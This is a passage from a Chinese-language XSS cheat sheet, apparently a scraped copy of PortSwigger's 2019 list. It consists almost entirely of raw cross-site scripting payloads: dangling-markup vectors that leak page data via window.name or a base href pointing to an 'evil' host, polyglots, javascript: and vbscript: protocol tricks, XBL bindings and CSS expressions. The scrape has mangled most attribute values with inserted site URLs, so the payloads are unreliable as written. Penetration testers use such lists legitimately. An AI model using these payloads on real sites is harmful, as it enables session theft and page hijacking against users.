跨站脚本（XSS）备忘单-2019版 (7)

使用formtarget通过window.name传递标记数据

<form><input type=submit value=http://www.likecs.com/"Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget=http://www.likecs.com/"

使用基本href传递数据

<a href=http://www.likecs.com/abc style=http://www.likecs.com/"width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href=http://www.likecs.com/"//evil/

使用embed src从页面传递数据

<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name=http://www.likecs.com/"

使用iframe窗口名称从页面传递数据

<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name=http://www.likecs.com/"

使用object窗口名称从页面传递数据

<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name=http://www.likecs.com/"

使用frameset窗口名称从页面传递数据

<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name=http://www.likecs.com/" 多语言有效载荷

多语言有效载荷1

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=http://www.likecs.com/1/+/[*/[]/+alert(1)//'>

多语言有效载荷2

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=http://www.likecs.com/*&lt;svg/*/onload=alert()//> 经典向量（XSS加密）

具有JavaScript协议的Image src

<img src=http://www.likecs.com/"javascript:alert(1)">

带有JavaScript协议的正文背景

<body background=http://www.likecs.com/"javascript:alert(1)">

随着现代浏览器使用空来源，iframe数据网址不再起作用

<iframe src=http://www.likecs.com/"data:text/html,<img src=http://www.likecs.com/1 onerror=alert(document.domain)>">

用于IE的VBScript协议

<a href="http://www.likecs.com/vbscript:MsgBox+1">XSS</a> <a href="#">XSS</a> <a href="#">XSS</a> <a href="#">XSS</a> <a href="#">XSS</a> <a href="#" language=vbs>XSS</a>

JScript compact是JS的最小版本，未在IE中广泛使用

<a href="#">test</a> <a href="#">test</a>

JScript.Encode允许编码的JavaScript

<a href=http://www.likecs.com/# language="JScript.Encode">XSS</a> <a href=http://www.likecs.com/#>XSS</a>

VBScript.Encoded允许编码的VBScript

<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@> <iframe language=VBScript.Encode onload=http://www.likecs.com/#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

用于Netscape Navigator的JavaScript实体

<a title="&{alert(1)}">XSS</a>

Netscape Navigator曾经支持JavaScript样式表

<link href=http://www.likecs.com/"xss.js" rel=stylesheet type=http://www.likecs.com/"text/javascript">

用于消耗标记的按钮

<form><button name=x formaction=x><b>stealme

IE9选择元素和纯文本用于消耗标记

<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

仅限XBL Firefox <= 2

<div style=http://www.likecs.com/"-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style=http://www.likecs.com/"\-\mo\z-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style=http://www.likecs.com/"-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)"> <div style=http://www.likecs.com/"-moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">

XBL也使用数据URL在FF3.5中工作

<img src=http://www.likecs.com/"blah" style=http://www.likecs.com/"-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" />

CSS表达式<= IE7

<div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio\006e(alert(1))> <div style=xss:expressio\00006e(alert(1))> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio&#x5c;6e(alert(1))>

在怪癖模式下，IE允许您使用=代替：

<div style=xss=expression(alert(1))> <div>test</div>

IE较旧模式的行为

<a folder="javascript:alert(1)">XSS</a>